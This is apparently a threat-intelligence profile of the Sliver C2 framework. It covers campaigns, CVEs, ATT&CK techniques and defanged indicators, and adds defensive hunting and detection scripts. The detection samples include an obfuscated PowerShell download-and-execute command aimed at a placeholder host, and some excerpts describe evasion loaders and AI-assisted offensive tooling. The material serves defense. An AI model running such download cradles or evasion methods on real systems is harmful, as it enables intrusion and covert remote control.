Sliver
Sliver is an open-source, cross-platform adversary emulation and post-exploitation command-and-control (C2) framework written in Go, often described as an open-source alternative to Cobalt Strike. It generates implants (sessions and beacons) for Windows, macOS, and Linux on x86, x64, and ARM, and is used both legitimately for red teaming and security testing and abusively by threat actors for long-term remote access and post-compromise operations. Capabilities reported in the sources collected here include encrypted C2 over mutual TLS, WireGuard, HTTP(S), and DNS, with an RSA key exchange mentioned in some reporting; payload encoders such as gzip, hex, and an English-word encoder; periodic beaconing to poll for tasking; file exfiltration through the implant's download command; and in-memory loading of the implant by other malware. The sources also describe implants compiled with garble obfuscation and builds shipped with faked digital signatures.
Observed delivery and execution chains include Bumblebee dropping Sliver payloads; DLL side-loading, in which a malicious appwiz.cpl loaded by Fondue.exe injected a Sliver implant into that process's memory; shell scripts that download architecture-specific Sliver binaries; and exploitation chains such as React2Shell that end with Sliver installed on Linux hosts. Persistence and infrastructure details named in the sources: a Sliver implant fetched from keep.camdvr[.]org:8000/BREAKABLE_PARABLE5 that beaconed to keep.camdvr[.]org and persisted as /usr/bin/sshd-agent, installed either as a systemd unit or through user-space crontab and .bashrc entries; and a Versatile Werewolf campaign whose implant contacted curtainbeatdisturbance[.]com, created the mutex MediumTurquoiseBeige, and persisted through a scheduled task named in the format MicrosoftEdgeUpdateTaskMachineUA{GUID}. Beacon filenames seen in the reporting include update.bin, update-386.bin, and update-arm.bin.
Threat actor and campaign associations named in the sources include DEV-0237 and DEV-0401 adopting Sliver in place of Cobalt Strike in some ransomware-linked intrusions; the Royal ransomware ecosystem prioritizing Sliver as a Cobalt Strike alternative; China-linked ToolShell exploitation using Sliver alongside ShadowPad, Zingdoor, and KrustyLoader; React2Shell exploitation against Russian targets; and Sliver appearing next to other offensive frameworks such as Havoc, Covenant, Mythic, Brute Ratel, and GC2. The sources also describe Sliver C2 servers hosted on Ubuntu in an attacker lab, Palo Alto firewalls that used Sliver for external communication after exploitation, and PCPJack-associated tooling that deployed Sliver beacons during credential theft. Taken together, the reporting consistently characterizes Sliver as a widely abused post-exploitation and C2 framework seen across espionage, ransomware, botnet, and intrusion operations.
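The persistence artifacts above (the /usr/bin/sshd-agent binary wired in through a systemd unit or user-level crontab and .bashrc entries, and the MicrosoftEdgeUpdateTaskMachineUA{GUID} scheduled task) are what a responder triages first. The following is an added hunting example written for this page, not code from the cited reports or from the Sliver project. It scans a root prefix for the Linux artifacts and classifies exported Windows task XML; the scanned directories, the stock Edge updater path, and all sample file contents are assumptions or constructed data. One caveat a practitioner needs: Microsoft Edge's own updater registers scheduled tasks with exactly that MicrosoftEdgeUpdateTaskMachineUA{GUID} name, so the task name by itself is not a detection; what separates the rogue task from the real one is its action path.

```python
"""Added hunting example (written for this page, not code from the cited reports or
from the Sliver project): triage the persistence artifacts the write-ups attribute
to Sliver implants. All file contents and task XML below are constructed samples."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Artifact name from the reporting. Stock OpenSSH ships sshd and ssh-agent, never
# "sshd-agent", so any reference to it is worth a look.
SUSPECT = "sshd-agent"

# Directories scanned relative to a root prefix, so the scan can run against a mounted
# disk image or the constructed test tree rather than the live host (assumed locations).
LINUX_LOCATIONS = ["etc/systemd/system", "var/spool/cron/crontabs", "home"]


def hunt_linux_persistence(root):
    """Return sorted (path, line) pairs referencing the suspect binary in systemd units,
    crontabs and bash rc files under root, plus a marker if the binary itself exists."""
    hits = []
    binary = os.path.join(root, "usr", "bin", SUSPECT)
    if os.path.exists(binary):
        hits.append((binary, "<binary present>"))
    for loc in LINUX_LOCATIONS:
        for dirpath, _, files in os.walk(os.path.join(root, loc)):
            for name in files:
                if not (name.endswith(".service") or "crontabs" in dirpath or name.startswith(".bash")):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, errors="replace") as fh:
                    hits.extend((path, line.strip()) for line in fh if SUSPECT in line)
    return sorted(hits)


# Windows side. The legitimate Edge updater registers tasks named exactly like this too
# (a fact about Edge, not from the page), so the name alone is not a detection: the
# action path is what separates the two. The updater path is an assumption about a
# stock per-machine install; adjust it for your environment.
EDGE_TASK = re.compile(r"^MicrosoftEdgeUpdateTaskMachineUA\{[0-9A-Fa-f-]{36}\}$")
EDGE_UPDATER = r"c:\program files (x86)\microsoft\edgeupdate\microsoftedgeupdate.exe"
_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def triage_edge_task(name, task_xml):
    """Classify an exported scheduled task: 'ignore' (name does not match the pattern),
    'benign' (every Exec action is the Edge updater) or 'suspicious'."""
    if not EDGE_TASK.match(name):
        return "ignore"
    cmds = [c.text or "" for c in ET.fromstring(task_xml).findall(".//t:Exec/t:Command", _NS)]
    if not cmds:
        return "suspicious"  # a matching name with no Exec action is not what the updater creates
    for cmd in cmds:
        if cmd.strip().strip('"').lower() != EDGE_UPDATER:
            return "suspicious"
    return "benign"


# ---- constructed sample data --------------------------------------------------------
def build_sample_tree():
    """Write a tiny filesystem fragment mirroring the reported Linux persistence into a temp dir."""
    root = tempfile.mkdtemp()
    files = {
        "usr/bin/sshd-agent": "ELF placeholder",
        "etc/systemd/system/sshd-agent.service": "[Service]\nExecStart=/usr/bin/sshd-agent\n",
        "etc/systemd/system/cron.service": "[Service]\nExecStart=/usr/sbin/cron -f\n",
        "var/spool/cron/crontabs/www-data": "@reboot /usr/bin/sshd-agent\n",
        "home/alice/.bashrc": "alias ll='ls -l'\n/usr/bin/sshd-agent &\n",
        "home/bob/.bashrc": "export EDITOR=vim\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


_TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
             '<Actions><Exec><Command>{cmd}</Command></Exec></Actions></Task>')
BENIGN_TASK = _TASK_XML.format(cmd=r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"')
ROGUE_TASK = _TASK_XML.format(cmd=r"C:\Users\Public\Fondue.exe")
TASK_NAME = "MicrosoftEdgeUpdateTaskMachineUA{11111111-2222-3333-4444-555555555555}"

if __name__ == "__main__":
    for path, line in hunt_linux_persistence(build_sample_tree()):
        print(f"{path}: {line}")
    print(TASK_NAME, "->", triage_edge_task(TASK_NAME, BENIGN_TASK), "/", triage_edge_task(TASK_NAME, ROGUE_TASK))
```

Point hunt_linux_persistence at a mounted image's mount point, or at "/" on a live host. Task XML for the Windows check comes from `schtasks /Query /TN <name> /XML` or `Export-ScheduledTask`.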
Vulnerabilities exploited
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets and the Sliver implant.
More recently, at the end of November, Darktrace analysts observed a spike in exploitation and post-exploitation activity affecting, once again, Palo Alto firewall devices in the days following the disclosure of the CVE-2024-0012 and CVE-2024-9474 vulnerabilities. ... CVE-2024-0012 is an authentication bypass vulnerability affecting unpatched versions of Palo Alto Networks Next-Generation Firewalls. | Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication. An open-source alternative to Cobalt Strike, this framework has been increasingly popular among threat actors, enabling the generation of dynamic payloads (“slivers”) for multiple platforms, including Windows, MacOS, Linux.
Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication. An open-source alternative to Cobalt Strike, this framework has been increasingly popular among threat actors, enabling the generation of dynamic payloads (“slivers”) for multiple platforms, including Windows, MacOS, Linux. | More recently, at the end of November, Darktrace analysts observed a spike in exploitation and post-exploitation activity affecting, once again, Palo Alto firewall devices in the days following the disclosure of the CVE-2024-0012 and CVE-2024-9474 vulnerabilities. ... CVE-2024-9474 is a privilege escalation vulnerability that allows a PAN-OS administrator with access to the management web interface to execute root-level commands, granting full control over the affected device.
Check Point researchers said the tool is being discussed on underground forums, where hackers are exchanging instructions on how to deploy it against three Citrix NetScaler flaws disclosed last week: CVE-2025-7775, CVE-2025-7776 and CVE-2025-8424. The most critical of these, CVE-2025-7775, allows unauthenticated remote code execution.
In another cluster of activity, since at least March 5, 2026, Sliver, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename “CWan”.
CVE-2026-20182 carries a CVSSv3.1 score of 10.0 (Critical) and is classified under CWE-287: Improper Authentication. The flaw affects the Cisco Catalyst SD-WAN Controller (formerly vSmart)... The peering authentication mechanism is not functioning correctly, allowing an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on the affected system.
Analysis of react.py This script is clearly set to exploit CVE-2025-29927, also known as React2Shell. ... This script implements a fully automated React/Next.js exploitation pipeline centered on abusing CVE-2025-29927 to achieve remote command execution at scale.
“KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor. It then decrypts this payload… and injects it directly into memory as shellcode…” | On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.
Figure 3: Upgrade Netcat Connection to Sliver Implant ... Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials.
KrustyLoader, which is typically used for dropping Sliver backdoors.
"On some machines, the attackers deployed Sliver framework, an implant that provided them with full remote control of compromised systems."
“we found… backdoors… starting with the Sliver implant… Both download Sliver implants, and both connected back to the same server…”
In versions 1.5.43 and earlier, the netstack does not limit traffic between WireGuard clients... https://hngnh.com/posts/Sliver-CVE-2025-27093/ (CVE-2025-27093 is a vulnerability in Sliver's own WireGuard transport, not a flaw Sliver operators exploit for access; it appears in this list only by correlation.)
Groups observed using it
29 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer... The applet loading results in the deployment of a Sliver post-exploitation framework implant within the Fondue.exe memory.
DEV-0237 now uses the SystemBC RAT and the penetration testing framework Sliver in their attacks, replacing Cobalt Strike. ... Around June 6, 2022, it began replacing Cobalt Strike with the Sliver framework in their attacks.
The multi-stage attack chain deployed EchoGather RAT via Telegram channels and phishing pages, Sliver implant via DLL side-loading through Fondue.exe, SoullessRAT via fake AlphaFly installer, and AquilaRAT (Rust backdoor) leveraging multiple rotating C2 domains.
UNC5174 has been observed using SNOWLIGHT to download Sliver and VSHELL.
IP 67.217.57[.]240 December 2025 Sliver C2 infrastructure
Sliver, an open-source, cross-platform adversary simulation and C2 framework originally designed for red team and penetration testing, enables command-and-control over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS...
China-nexus groups (i.e., Earth Lamia, Jackpot Panda, UNC5174) deploying Cobalt Strike beacons, Sliver, and Vshell backdoors
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
KrustyLoader, which is typically used for dropping Sliver backdoors.
During analysis, researchers found that this binary is a payload generated with Sliver. Sliver is an open source cross-platform adversary emulation/red team framework...
...retrieved and decrypted a hidden payload—a remote access tool (RAT) based on Sliver, an open-source command-and-control framework.
Sliver is an open-source cross-platform C2 framework written in Golang and designed for organizations to perform security testing.
ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel.
"...utilizing tools such as the open-source Sliver and their custom DTrack malware to move laterally and maintain persistence..."
“The primary C2 frameworks observed were Cobalt Strike, VShell, Havoc, Sliver, and SparkRat.”
"The group also used tooling such as Cobalt Strike, Sliver, and multiple web shells..."
“The attackers attempted to use a Sliver shell implant to elevate privileges.”
Several days later, on March 2, our network scans identified a Sliver C2 server on port 31337.
Techniques & procedures
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Sources repeatedly describe threat actors obtaining, acquiring, or using publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
2 techniques
At that point, they captured a victim’s credentials, which led them to query Active Directory.
Soon enough, an Initial Access Broker (IAB) ... used a phishing campaign and executed offensive hacking tool Sliver on the endpoint.
Execution
6 techniques
The malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
A framework created by cybersecurity researcher Muhammad Osama supports automated penetration testing. Dubbed HexStrike-AI, it connects large language models to more than 150 existing security tools, running them in sequence with retry logic and error recovery.
run-script.ps1, a PowerShell script to load and execute code via PowerShell. The file contains: powershell -w hidden -ep bypass -c "I''E''X...DOWNLOADDaTa(...)"
The infection begins with bootstrap.sh, a shell script designed for Linux systems. This script serves only to set up the environment and download additional payloads.
helper.vbs, a VBS file ... that executes run-script.ps1.
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
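The run-script.ps1 line above shows the string-splitting trick (I''E''X for IEX, mixed-case DOWNLOADDaTa) that defeats naive keyword matching on command lines. As an added detection example written for this page, not code from the cited report, the block below normalizes a PowerShell command line before scoring it. The full sample command line is constructed, since the page only shows a truncated fragment, and the indicator set and alert threshold are assumptions to tune against your own process-creation telemetry.

```python
"""Added detection example (written for this page, not from the cited report): score a
PowerShell command line for the download-cradle pattern quoted above. The full command
lines below are constructed samples; the page only shows a truncated fragment."""
import re


# String-splitting tricks seen in the wild: empty quoted strings spliced into a bareword
# (PowerShell parses I''E''X as the single command name IEX) and backtick escapes inside
# barewords (I`E`X). Stripping both before matching keeps the regexes simple. Removing every
# backtick before a letter also destroys real escapes such as `n and `t; that is fine for
# scoring a command line, not for executing it.
def normalize_ps(cmdline):
    s = cmdline.replace("''", "").replace('""', "")
    s = re.sub(r"`(?=[A-Za-z])", "", s)
    return re.sub(r"\s+", " ", s).strip().lower()


# Each indicator is weak on its own (-w hidden is common in admin scripts); it is the
# co-occurrence of cradle + IEX + hidden window + policy bypass that is characteristic.
INDICATORS = [
    ("download_cradle", re.compile(r"\.download(data|string|file)\s*\(")),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b")),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden\b")),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass\b")),
    ("encoded_command", re.compile(r"-e(ncodedcommand|nc|c)?\s+[a-z0-9+/=]{20,}")),
]


def score_commandline(cmdline):
    """Return (score, matched indicator names) for one raw command line."""
    norm = normalize_ps(cmdline)
    matched = [name for name, rx in INDICATORS if rx.search(norm)]
    return len(matched), matched


def flag(cmdline, threshold=3):
    """True when enough indicators co-occur to justify an alert (threshold is an assumption)."""
    return score_commandline(cmdline)[0] >= threshold


# Constructed samples. "cradle" reconstructs the quoted pattern with the elided part filled
# by a typical WebClient cradle; the host is a non-routable placeholder.
SAMPLES = {
    "cradle": "powershell -w hidden -ep bypass -c \"I''E''X ([Text.Encoding]::UTF8.GetString("
              "(New-Object Net.WebClient).DOWNLOADDaTa('https://example.invalid/p')))\"",
    "backtick": "powershell -W Hidden -Ep Bypass -C \"I`E`X (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/q')\"",
    "admin": r"powershell -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(label, score_commandline(line), "ALERT" if flag(line) else "ok")
```

Feed it the CommandLine field from Sysmon event 1 or Windows Security 4688 (with command-line auditing enabled); the normalizer is what makes the mixed-case and split-string variants collapse onto the same indicators.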
Persistence
2 techniques
The malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
Privilege Escalation
3 techniques
The malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
Stealth
8 techniques
Normally this is the point when we start changing strings and hoping for the best... Maybe the entropy in your binary is off because you wanted to use compression... Maybe the file needs some kind of spoofed Authenticode signature... we need to spend time hardening our binaries against static analysis.
This post is about that loader, which we call WasmForge ... You point it at a Go project and you get back a Windows or macOS binary that runs your tool but doesn’t look anything like it ... The third generates an outer Go binary containing a Wazero runtime, embeds the encrypted WASM module into the binary’s PE sections.
The loader compiles the original tool to WebAssembly, wraps it in a runtime that proxies syscalls and Win32 APIs back to the host, and ships the WASM payload encrypted inside an outer Go binary disguised as a real piece of infrastructure software.
Once we had a working ghost-profile pipeline producing reliably clean binaries... The loader compiles the original tool to WebAssembly, wraps it in a runtime... and ships the WASM payload encrypted inside an outer Go binary disguised as a real piece of infrastructure software.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
At that point, they captured a victim’s credentials, which led them to query Active Directory.
the C# dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
Sliver – We tested ... execute-assembly against Seatbelt and Rubeus ... Watching execute-assembly Rubeus.exe kerberoast complete successfully against a domain controller, through a WASM-bridged COM call into the CLR running a loaded Rubeus assembly, was significantly more rewarding ...
Defense Impairment
1 technique
Maybe the file needs some kind of spoofed Authenticode signature... Last month one of our build pipelines to obfuscate Sliver started getting hit at 100% by AhnLab... every single binary that we’d faked a digital signature for was detected with that exact rule.
Discovery
1 technique
Sliver – We tested beacon and session implants ... file I/O, process listing ... Tribunus ... standard commands like shell, ps, netstat, whoami.
Command and Control
10 techniques
URI patterns and PCAPs analysis yielded evidence of both English word type encoding within Sliver and Gzip formatting.
Some Backdoor.Oldrea samples use standard Base64 + bzip2... gh0st RAT has used Zlib to compress C2 communications data before encrypting it... HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.
These included customized Cobalt Strike profiles designed to mimic legitimate web traffic. Telegram bot–based command-and-control channel to hide communications within trusted infrastructure. A Cloudflare Worker was also used as a redirector to obscure the true backend C2 server.
Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication... multiple devices contacted the Sliver-linked IP address 77.221.158[.]154 using HTTP to retrieve Gzip files.
In MITRE ATT&CK terms these are specific techniques: Proxy (T1090, Command and Control) - routing C2 traffic through an intermediate node
The whole pipeline exists to solve one specific problem: take an existing offensive security tool, change zero lines of its source code, and produce a binary you can actually drop on a hardened endpoint.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
The applet loading results in the deployment of a Sliver post-exploitation framework implant within the Fondue.exe memory.
External connectivity during this phase also featured TCP connection attempts over uncommon ports for common application protocols... devices utilized destination ports such as 8089, 3939, 8880, 8084, and 9999 for the HTTP protocol.
Several targeted customer devices were observed initiating TLS/SSL connections to rare external IPs with self-signed TLS certificates following exploitation... These TLS/SSL sessions were typically established without the specification of a Server Name Indication (SNI).
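The three network traits listed in this section (periodic check-ins, HTTP on uncommon ports such as 8089, and TLS to rare IPs with self-signed certificates and no SNI) can be scored together per flow. The block below is an added detection example written for this page, not code from Darktrace or the Sliver project. The records are constructed in the shape of a Zeek conn.log joined with ssl.log fields, the IPs are documentation-range placeholders rather than the reported indicators, and the thresholds (six check-ins, coefficient of variation at most 0.3) are tuning assumptions. Sliver beacons are generated with an interval and a jitter setting, so some spread in check-in timing is deliberate; the regularity test still works because the jitter is bounded, but an aggressive jitter needs a looser threshold and a longer observation window.

```python
"""Added detection example (written for this page, not from the cited Darktrace report):
score network flows for the traits the C2 section attributes to Sliver traffic: periodic
check-ins, HTTP on uncommon ports, and TLS to rare IPs with self-signed certificates and
no SNI. Records are constructed in the shape of Zeek conn.log joined with ssl.log; the IPs
are documentation-range placeholders, not the indicators from the reporting."""
import statistics
from collections import defaultdict


# Each record: (ts, src, dst, dport, service, sni, self_signed)
def _beacon_flow():
    # 60 s interval with a few seconds of jitter, the kind of spread a configured beacon
    # jitter produces; the offsets are fixed so the result is reproducible.
    offsets = [0, 3, -2, 5, 1, -4, 2, 0, 3, -1]
    return [(1700000000 + 60 * i + j, "10.0.0.5", "203.0.113.10", 8089, "http", "", False)
            for i, j in enumerate(offsets)]


SAMPLE = _beacon_flow() + [
    # sporadic browsing to a CDN with SNI and a CA-issued cert: not a beacon
    *[(1700000000 + t, "10.0.0.6", "198.51.100.7", 443, "ssl", "cdn.example", False)
      for t in (0, 11, 400, 401, 402, 1900, 2500)],
    # three TLS sessions with no SNI to a self-signed endpoint, not (yet) periodic
    (1700000100, "10.0.0.7", "203.0.113.22", 443, "ssl", "", True),
    (1700000250, "10.0.0.7", "203.0.113.22", 443, "ssl", "", True),
    (1700000900, "10.0.0.7", "203.0.113.22", 443, "ssl", "", True),
]

COMMON_HTTP_PORTS = {80, 8080}  # assumption: what "common" means for plain HTTP in this network


def analyze(records, min_count=6, max_cv=0.3):
    """Group records by (src, dst, dport) and return per-flow stats and flags.
    cv is the coefficient of variation of inter-arrival times: a low cv over enough
    check-ins means a timer, not a user, is driving the traffic. Thresholds are tuning
    assumptions; a beacon with aggressive jitter needs a looser max_cv and a longer window."""
    flows = defaultdict(list)
    for rec in records:
        flows[(rec[1], rec[2], rec[3])].append(rec)
    results = {}
    for key, recs in flows.items():
        recs.sort(key=lambda r: r[0])
        gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        mean = statistics.mean(gaps) if gaps else None
        cv = statistics.pstdev(gaps) / mean if len(gaps) >= 2 and mean else None
        flags = []
        if cv is not None and len(recs) >= min_count and cv <= max_cv:
            flags.append("regular_beacon")
        if key[2] not in COMMON_HTTP_PORTS and any(r[4] == "http" for r in recs):
            flags.append("http_uncommon_port")
        if any(r[4] == "ssl" and not r[5] and r[6] for r in recs):
            flags.append("tls_no_sni_self_signed")
        results[key] = {"count": len(recs), "mean_interval": mean, "cv": cv, "flags": flags}
    return results


def rank(results):
    """Flows ordered by number of flags, strongest first; ties broken by key for stability."""
    return sorted(results.items(), key=lambda kv: (-len(kv[1]["flags"]), kv[0]))


if __name__ == "__main__":
    for key, info in rank(analyze(SAMPLE)):
        print(key, info)
```

The per-flow grouping is deliberate: a beacon is a property of one (host, destination, port) tuple over time, and the self-signed/no-SNI flag is worth keeping separate from the timing flag, since the three-connection flow above is exactly what an implant looks like in the first few minutes before there is enough history to call it periodic.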
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Other
2 techniques
Sophos X-Ops analysts observed a threat actor using artificial intelligence (AI) technologies to test endpoint detection and response (EDR) evasion tactics in a “red team” post-exploitation framework.
The activity was detected when an anomalous endpoint registered within a customer tenant triggered alerts... indicative of a broader attack framework focused on evading detection... a lab that uses an iterative approach to developing and testing malware against the Sophos, CrowdStrike, and Windows Defender endpoint detection and response (EDR) agents.
IOCs tracked for this family
104 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
157 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Used as a command-and-control server within the attacker’s lab environment to support post-exploitation testing and operations.
A post-exploitation command-and-control framework used here as the C2 server within the attacker’s testing environment.
Referenced as a command-and-control framework associated with application-layer C2 traffic that can be masked to evade ML-based IDS detection.
Command-and-control implant/framework that periodically checks in for commands and can shape traffic to resemble legitimate applications.